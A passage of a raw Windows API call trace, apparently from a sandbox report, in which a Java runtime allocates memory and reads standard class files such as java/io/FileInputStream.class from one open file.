(_Size=0x48) returned 0x121d9940 [0094.316] malloc (_Size=0xa0) returned 0x1220d090 [0094.316] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d0cc, lpNewFilePointer=0x208e4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4a0*=54644940) returned 1 [0094.316] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e470, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e470*=0xa0, lpOverlapped=0x0) returned 1 [0094.317] malloc (_Size=0x25) returned 0x121d7d00 [0094.317] free (_Block=0x1220d090) [0094.317] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b85e8, lpNewFilePointer=0x208e0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0a0*=52135400) returned 1 [0094.317] ReadFile (in: hFile=0x134, lpBuffer=0x208e0f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e070, lpOverlapped=0x0 | out: lpBuffer=0x208e0f0*, lpNumberOfBytesRead=0x208e070*=0x1e, lpOverlapped=0x0) returned 1 [0094.317] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b862a, lpNewFilePointer=0x208e100, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e100*=52135466) returned 1 [0094.317] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x8cf, lpNumberOfBytesRead=0x208e0d0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e0d0*=0x8cf, lpOverlapped=0x0) returned 1 [0094.318] malloc (_Size=0x48) returned 0x121d90d0 [0094.318] malloc (_Size=0xa0) returned 0x1220d090 [0094.319] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d083, lpNewFilePointer=0x208d9e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9e0*=54644867) returned 1 [0094.319] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d9b0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208d9b0*=0xa0, lpOverlapped=0x0) returned 1 [0094.319] malloc (_Size=0x1c) returned 0x121d8150 [0094.319] free (_Block=0x1220d090) [0094.319] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b84ca, lpNewFilePointer=0x208d5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5e0*=52135114) returned 1 [0094.319] ReadFile (in: hFile=0x134, lpBuffer=0x208d630, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d5b0, lpOverlapped=0x0 | out: lpBuffer=0x208d630*, lpNumberOfBytesRead=0x208d5b0*=0x1e, lpOverlapped=0x0) returned 1 [0094.319] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b8503, lpNewFilePointer=0x208d640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d640*=52135171) returned 1 [0094.319] ReadFile (in: hFile=0x134, lpBuffer=0x2103490, nNumberOfBytesToRead=0xe5, lpNumberOfBytesRead=0x208d610, lpOverlapped=0x0 | out: lpBuffer=0x2103490*, lpNumberOfBytesRead=0x208d610*=0xe5, lpOverlapped=0x0) returned 1 [0094.320] malloc (_Size=0x48) returned 0x121d93f0 [0094.320] malloc (_Size=0xa0) returned 0x1220d090 [0094.320] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d03d, lpNewFilePointer=0x208d9e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9e0*=54644797) returned 1 [0094.320] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d9b0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208d9b0*=0xa0, lpOverlapped=0x0) returned 1 [0094.320] malloc (_Size=0x19) returned 0x121d7e20 [0094.323] free (_Block=0x1220d090) [0094.323] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b81b8, lpNewFilePointer=0x208d5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5e0*=52134328) returned 1 [0094.323] ReadFile (in: hFile=0x134, lpBuffer=0x208d630, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d5b0, lpOverlapped=0x0 | out: lpBuffer=0x208d630*, lpNumberOfBytesRead=0x208d5b0*=0x1e, lpOverlapped=0x0) returned 1 [0094.323] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b81ee, lpNewFilePointer=0x208d640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d640*=52134382) returned 1 [0094.323] ReadFile (in: hFile=0x134, lpBuffer=0x2103490, nNumberOfBytesToRead=0x2dc, lpNumberOfBytesRead=0x208d610, lpOverlapped=0x0 | out: lpBuffer=0x2103490*, lpNumberOfBytesRead=0x208d610*=0x2dc, lpOverlapped=0x0) returned 1 [0094.325] malloc (_Size=0x48) returned 0x121d92b0 [0094.325] malloc (_Size=0xa0) returned 0x1220d090 [0094.325] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cff8, lpNewFilePointer=0x208e3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3e0*=54644728) returned 1 [0094.325] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e3b0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e3b0*=0xa0, lpOverlapped=0x0) returned 1 [0094.325] malloc (_Size=0x18) returned 0x1220cc80 [0094.326] free (_Block=0x1220d090) [0094.326] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b7106, lpNewFilePointer=0x208dfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfe0*=52130054) returned 1 [0094.326] ReadFile (in: hFile=0x134, lpBuffer=0x208e030, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dfb0, lpOverlapped=0x0 | out: lpBuffer=0x208e030*, lpNumberOfBytesRead=0x208dfb0*=0x1e, lpOverlapped=0x0) returned 1 [0094.327] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b713b, lpNewFilePointer=0x208e040, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e040*=52130107) returned 1 [0094.327] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x107d, lpNumberOfBytesRead=0x208e010, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e010*=0x107d, lpOverlapped=0x0) returned 1 [0094.332] strlen (_Str="sun/misc/Version.class") returned 0x16 [0094.332] malloc (_Size=0x48) returned 0x121d9300 [0094.332] malloc (_Size=0xa0) returned 0x1220d090 [0094.332] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cfb4, lpNewFilePointer=0x208e450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e450*=54644660) returned 1 [0094.332] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e420, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e420*=0xa0, lpOverlapped=0x0) returned 1 [0094.332] malloc (_Size=0x17) returned 0x1220cdc0 [0094.333] free (_Block=0x1220d090) [0094.334] strlen (_Str="sun/misc/Version.class") returned 0x16 [0094.334] strcpy (in: _Dest=0x208e5d0, _Source="sun/misc/Version.class" | out: _Dest="sun/misc/Version.class") returned="sun/misc/Version.class" [0094.334] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b5f57, lpNewFilePointer=0x208e050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e050*=52125527) returned 1 [0094.334] ReadFile (in: hFile=0x134, lpBuffer=0x208e0a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e020, lpOverlapped=0x0 | out: lpBuffer=0x208e0a0*, lpNumberOfBytesRead=0x208e020*=0x1e, lpOverlapped=0x0) returned 1 [0094.335] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b5f8b, lpNewFilePointer=0x208e0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0b0*=52125579) returned 1 [0094.335] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x117b, lpNumberOfBytesRead=0x208e080, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e080*=0x117b, lpOverlapped=0x0) returned 1 [0094.336] free (_Block=0x1220cc80) [0094.336] free (_Block=0x121d92b0) [0094.353] strlen (_Str="java/io/FileInputStream.class") returned 0x1d [0094.353] malloc (_Size=0x48) returned 0x121d9ad0 [0094.353] malloc (_Size=0xa0) returned 0x1220d090 [0094.353] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cf69, lpNewFilePointer=0x208e700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e700*=54644585) returned 1 [0094.353] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e6d0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e6d0*=0xa0, lpOverlapped=0x0) returned 1 [0094.353] malloc (_Size=0x1e) returned 0x121d8060 [0094.354] free (_Block=0x1220d090) [0094.354] strlen (_Str="java/io/FileInputStream.class") returned 0x1d [0094.354] strcpy (in: _Dest=0x208e880, _Source="java/io/FileInputStream.class" | out: _Dest="java/io/FileInputStream.class") returned="java/io/FileInputStream.class" [0094.354] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b53e8, lpNewFilePointer=0x208e300, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e300*=52122600) returned 1 [0094.354] ReadFile (in: hFile=0x134, lpBuffer=0x208e350, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e2d0, lpOverlapped=0x0 | out: lpBuffer=0x208e350*, lpNumberOfBytesRead=0x208e2d0*=0x1e, lpOverlapped=0x0) returned 1 [0094.355] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b5423, lpNewFilePointer=0x208e360, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e360*=52122659) returned 1 [0094.355] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xb34, lpNumberOfBytesRead=0x208e330, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e330*=0xb34, lpOverlapped=0x0) returned 1 [0094.355] free (_Block=0x1220cdc0) [0094.355] free (_Block=0x121d9300) [0094.384] malloc (_Size=0x48) returned 0x121d92b0 [0094.384] malloc (_Size=0xa0) returned 0x1220d090 [0094.385] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cf1f, lpNewFilePointer=0x208e5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5b0*=54644511) returned 1 [0094.385] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e580, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e580*=0xa0, lpOverlapped=0x0) returned 1 [0094.385] malloc (_Size=0x1d) returned 0x121d7a30 [0094.385] free (_Block=0x1220d090) [0094.385] strlen (_Str="java/io/FileDescriptor.class") returned 0x1c [0094.385] strcpy (in: _Dest=0x208e730, _Source="java/io/FileDescriptor.class" | out: _Dest="java/io/FileDescriptor.class") returned="java/io/FileDescriptor.class" [0094.386] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b4a1d, lpNewFilePointer=0x208e1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1b0*=52120093) returned 1 [0094.386] ReadFile (in: hFile=0x134, lpBuffer=0x208e200, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e180, lpOverlapped=0x0 | out: lpBuffer=0x208e200*, lpNumberOfBytesRead=0x208e180*=0x1e, lpOverlapped=0x0) returned 1 [0094.386] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b4a57, lpNewFilePointer=0x208e210, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e210*=52120151) returned 1 [0094.386] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x991, lpNumberOfBytesRead=0x208e1e0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e1e0*=0x991, lpOverlapped=0x0) returned 1 [0094.386] free (_Block=0x121d8060) [0094.386] free (_Block=0x121d9ad0) [0094.396] strlen (_Str="java/io/FileDescriptor$1.class") returned 0x1e [0094.396] malloc (_Size=0x48) returned 0x121d94e0 [0094.396] malloc (_Size=0xa0) returned 0x1220d090 [0094.396] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ced3, lpNewFilePointer=0x208ddd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ddd0*=54644435) returned 1 [0094.396] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dda0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208dda0*=0xa0, lpOverlapped=0x0) returned 1 [0094.396] malloc (_Size=0x1f) returned 0x121d7e80 [0094.396] free (_Block=0x1220d090) [0094.397] strlen (_Str="java/io/FileDescriptor$1.class") returned 0x1e [0094.397] strcpy (in: _Dest=0x208df50, _Source="java/io/FileDescriptor$1.class" | out: _Dest="java/io/FileDescriptor$1.class") returned="java/io/FileDescriptor$1.class" [0094.397] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b471c, lpNewFilePointer=0x208d9d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9d0*=52119324) returned 1 [0094.397] ReadFile (in: hFile=0x134, lpBuffer=0x208da20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d9a0, lpOverlapped=0x0 | out: lpBuffer=0x208da20*, lpNumberOfBytesRead=0x208d9a0*=0x1e, lpOverlapped=0x0) returned 1 [0094.397] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b4758, lpNewFilePointer=0x208da30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da30*=52119384) returned 1 [0094.397] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x2c5, lpNumberOfBytesRead=0x208da00, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208da00*=0x2c5, lpOverlapped=0x0) returned 1 [0094.397] free (_Block=0x121d7a30) [0094.398] free (_Block=0x121d92b0) [0094.399] strlen (_Str="sun/misc/JavaIOFileDescriptorAccess.class") returned 0x29 [0094.399] malloc (_Size=0x48) returned 0x121d9990 [0094.399] malloc (_Size=0xa0) returned 0x1220d090 [0094.399] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ce7c, lpNewFilePointer=0x208d310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d310*=54644348) returned 1 [0094.399] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d2e0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208d2e0*=0xa0, lpOverlapped=0x0) returned 1 [0094.399] malloc (_Size=0x2a) returned 0x121da370 [0094.400] free (_Block=0x1220d090) [0094.400] strlen (_Str="sun/misc/JavaIOFileDescriptorAccess.class") returned 0x29 [0094.400] strcpy (in: _Dest=0x208d490, _Source="sun/misc/JavaIOFileDescriptorAccess.class" | out: _Dest="sun/misc/JavaIOFileDescriptorAccess.class") returned="sun/misc/JavaIOFileDescriptorAccess.class" [0094.400] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b45c0, lpNewFilePointer=0x208cf10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf10*=52118976) returned 1 [0094.400] ReadFile (in: hFile=0x134, lpBuffer=0x208cf60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cee0, lpOverlapped=0x0 | out: lpBuffer=0x208cf60*, lpNumberOfBytesRead=0x208cee0*=0x1e, lpOverlapped=0x0) returned 1 [0094.400] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b4607, lpNewFilePointer=0x208cf70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf70*=52119047) returned 1 [0094.400] ReadFile (in: hFile=0x134, lpBuffer=0x2102ec0, nNumberOfBytesToRead=0x115, lpNumberOfBytesRead=0x208cf40, lpOverlapped=0x0 | out: lpBuffer=0x2102ec0*, lpNumberOfBytesRead=0x208cf40*=0x115, lpOverlapped=0x0) returned 1 [0094.400] free (_Block=0x121d7e80) [0094.401] free (_Block=0x121d94e0) [0094.412] GetStdHandle (nStdHandle=0xfffffff6) returned 0x20 [0094.412] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0094.413] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0094.417] strlen (_Str="java/io/FileOutputStream.class") returned 0x1e [0094.417] malloc (_Size=0x48) returned 0x121d9940 [0094.417] malloc (_Size=0xa0) returned 0x1220d090 [0094.417] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cafd, lpNewFilePointer=0x208e700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e700*=54643453) returned 1 [0094.417] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e6d0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e6d0*=0xa0, lpOverlapped=0x0) returned 1 [0094.417] malloc (_Size=0x1f) returned 0x121d7d60 [0094.418] free (_Block=0x1220d090) [0094.418] strlen (_Str="java/io/FileOutputStream.class") returned 0x1e [0094.418] strcpy (in: _Dest=0x208e880, _Source="java/io/FileOutputStream.class" | out: _Dest="java/io/FileOutputStream.class") returned="java/io/FileOutputStream.class" [0094.418] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a8d79, lpNewFilePointer=0x208e300, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e300*=52071801) returned 1 [0094.418] ReadFile (in: hFile=0x134, lpBuffer=0x208e350, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e2d0, lpOverlapped=0x0 | out: lpBuffer=0x208e350*, lpNumberOfBytesRead=0x208e2d0*=0x1e, lpOverlapped=0x0) returned 1 [0094.421] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a8db5, lpNewFilePointer=0x208e360, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e360*=52071861) returned 1 [0094.421] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xba4, lpNumberOfBytesRead=0x208e330, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e330*=0xba4, lpOverlapped=0x0) returned 1 [0094.422] free (_Block=0x121da370) [0094.423] free (_Block=0x121d9990) [0094.429] strlen (_Str="java/io/OutputStream.class") returned 0x1a [0094.429] malloc (_Size=0x48) returned 0x121d90d0 [0094.429] malloc (_Size=0xa0) returned 0x1220d090 [0094.429] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cab5, lpNewFilePointer=0x208dcc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dcc0*=54643381) returned 1 [0094.429] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc90, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208dc90*=0xa0, lpOverlapped=0x0) returned 1 [0094.429] malloc (_Size=0x1b) returned 0x121d7ee0 [0094.429] free (_Block=0x1220d090) [0094.430] strlen (_Str="java/io/OutputStream.class") returned 0x1a [0094.430] strcpy (in: _Dest=0x208de40, _Source="java/io/OutputStream.class" | out: _Dest="java/io/OutputStream.class") returned="java/io/OutputStream.class" [0094.430] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a8aa7, lpNewFilePointer=0x208d8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8c0*=52071079) returned 1 [0094.430] ReadFile (in: hFile=0x134, lpBuffer=0x208d910, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d890, lpOverlapped=0x0 | out: lpBuffer=0x208d910*, lpNumberOfBytesRead=0x208d890*=0x1e, lpOverlapped=0x0) returned 1 [0094.430] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a8adf, lpNewFilePointer=0x208d920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d920*=52071135) returned 1 [0094.430] ReadFile (in: hFile=0x134, lpBuffer=0x2103770, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x208d8f0, lpOverlapped=0x0 | out: lpBuffer=0x2103770*, lpNumberOfBytesRead=0x208d8f0*=0x29a, lpOverlapped=0x0) returned 1 [0094.431] free (_Block=0x121d7d60) [0094.431] free (_Block=0x121d9940) [0094.433] malloc (_Size=0x48) returned 0x121d9d00 [0094.433] malloc (_Size=0xa0) returned 0x1220d090 [0094.433] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ca70, lpNewFilePointer=0x208d200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d200*=54643312) returned 1 [0094.433] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d1d0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208d1d0*=0xa0, lpOverlapped=0x0) returned 1 [0094.433] malloc (_Size=0x18) returned 0x1220c7a0 [0094.434] free (_Block=0x1220d090) [0094.437] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a89e7, lpNewFilePointer=0x208ce00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce00*=52070887) returned 1 [0094.437] ReadFile (in: hFile=0x134, lpBuffer=0x208ce50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cdd0, lpOverlapped=0x0 | out: lpBuffer=0x208ce50*, lpNumberOfBytesRead=0x208cdd0*=0x1e, lpOverlapped=0x0) returned 1 [0094.437] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a8a1c, lpNewFilePointer=0x208ce60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce60*=52070940) returned 1 [0094.437] ReadFile (in: hFile=0x134, lpBuffer=0x2103ba0, nNumberOfBytesToRead=0x8b, lpNumberOfBytesRead=0x208ce30, lpOverlapped=0x0 | out: lpBuffer=0x2103ba0*, lpNumberOfBytesRead=0x208ce30*=0x8b, lpOverlapped=0x0) returned 1 [0094.444] strlen (_Str="java/io/BufferedInputStream.class") returned 0x21 [0094.444] malloc (_Size=0x48) returned 0x121d8fe0 [0094.445] malloc (_Size=0xa0) returned 0x1220d090 [0094.445] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ca21, lpNewFilePointer=0x208e700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e700*=54643233) returned 1 [0094.445] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e6d0, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208e6d0*=0xa0, lpOverlapped=0x0) returned 1 [0094.445] malloc (_Size=0x22) returned 0x121d7af0 [0094.445] free (_Block=0x1220d090) [0094.445] strlen (_Str="java/io/BufferedInputStream.class") returned 0x21 [0094.446] strcpy (in: _Dest=0x208e880, _Source="java/io/BufferedInputStream.class" | out: _Dest="java/io/BufferedInputStream.class") returned="java/io/BufferedInputStream.class" [0094.446] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a7d40, lpNewFilePointer=0x208e300, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e300*=52067648) returned 1 [0094.446] ReadFile (in: hFile=0x134, lpBuffer=0x208e350, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e2d0, lpOverlapped=0x0 | out: lpBuffer=0x208e350*, lpNumberOfBytesRead=0x208e2d0*=0x1e, lpOverlapped=0x0) returned 1 [0094.469] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a7d7f, lpNewFilePointer=0x208e360, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e360*=52067711) returned 1 [0094.469] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xc68, lpNumberOfBytesRead=0x208e330, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208e330*=0xc68, lpOverlapped=0x0) returned 1 [0094.469] free (_Block=0x1220c7a0) [0094.469] free (_Block=0x121d9d00) [0094.475] strlen (_Str="java/io/FilterInputStream.class") returned 0x1f [0094.475] malloc (_Size=0x48) returned 0x121d9990 [0094.475] malloc (_Size=0xa0) returned 0x1220d090 [0094.475] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c9d4, lpNewFilePointer=0x208dcc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dcc0*=54643156) returned 1 [0094.475] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc90, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208dc90*=0xa0, lpOverlapped=0x0) returned 1 [0094.475] malloc (_Size=0x20) returned 0x121d7d00 [0094.476] free (_Block=0x1220d090) [0094.476] strlen (_Str="java/io/FilterInputStream.class") returned 0x1f [0094.476] strcpy (in: _Dest=0x208de40, _Source="java/io/FilterInputStream.class" | out: _Dest="java/io/FilterInputStream.class") returned="java/io/FilterInputStream.class" [0094.476] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a79bf, lpNewFilePointer=0x208d8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8c0*=52066751) returned 1 [0094.476] ReadFile (in: hFile=0x134, lpBuffer=0x208d910, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d890, lpOverlapped=0x0 | out: lpBuffer=0x208d910*, lpNumberOfBytesRead=0x208d890*=0x1e, lpOverlapped=0x0) returned 1 [0094.476] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a79fc, lpNewFilePointer=0x208d920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d920*=52066812) returned 1 [0094.476] ReadFile (in: hFile=0x134, lpBuffer=0x2103830, nNumberOfBytesToRead=0x344, lpNumberOfBytesRead=0x208d8f0, lpOverlapped=0x0 | out: lpBuffer=0x2103830*, lpNumberOfBytesRead=0x208d8f0*=0x344, lpOverlapped=0x0) returned 1 [0094.477] free (_Block=0x121d7af0) [0094.477] free (_Block=0x121d8fe0) [0094.489] strlen (_Str="java/util/concurrent/atomic/AtomicReferenceFieldUpdater.class") returned 0x3d [0094.489] malloc (_Size=0x48) returned 0x121d99e0 [0094.489] malloc (_Size=0xa0) returned 0x1220d090 [0094.489] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341c969, lpNewFilePointer=0x208de30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de30*=54643049) returned 1 [0094.489] ReadFile (in: hFile=0x134, lpBuffer=0x1220d090, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208de00, lpOverlapped=0x0 | out: lpBuffer=0x1220d090*, lpNumberOfBytesRead=0x208de00*=0xa0, lpOverlapped=0x0) returned 1 [0094.489] malloc (_Size=0x3e) returned 0x121d9800 [0094.490] free (_Block=0x1220d090) [0094.490] strlen (_Str="java/util/concurrent/atomic/AtomicReferenceFieldUpdater.class") returned 0x3d [0094.490] strcpy (in: _Dest=0x208dfb0, _Source="java/util/concurrent/atomic/AtomicReferenceFieldUpdater.class" | out: _Dest="java/util/concurrent/atomic/AtomicReferenceFieldUpdater.class") returned="java/util/concurrent/atomic/AtomicReferenceFieldUpdater.class" [0094.490] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a70a8, lpNewFilePointer=0x208da30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da30*=52064424) returned 1 [0094.490] ReadFile (in: hFile=0x134, lpBuffer=0x208da80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208da00, lpOverlapped=0x0 | out: lpBuffer=0x208da80*, lpNumberOfBytesRead=0x208da00*=0x1e, lpOverlapped=0x0) returned 1 [0094.490] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a7103, lpNewFilePointer=0x208da90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da90*=52064515) returned 1 [0094.490] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x8bc, lpNumberOfBytesRead=0x208da60, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208da60*=0x8bc, lpOverlapped=0x0) returned 1 [0094.491] free (_Block=0x121d7d00) [0094.491] free (_Block=0x121d9990) [0094.503] strlen (_Str="java/util/concurrent/atomic/AtomicReferenceFieldUpdater$AtomicReferenceFieldUpdaterImpl.class") returned 0x5d [0094.503] malloc (_Size=0x48) returned 0x121d8fe0 [0094.503] 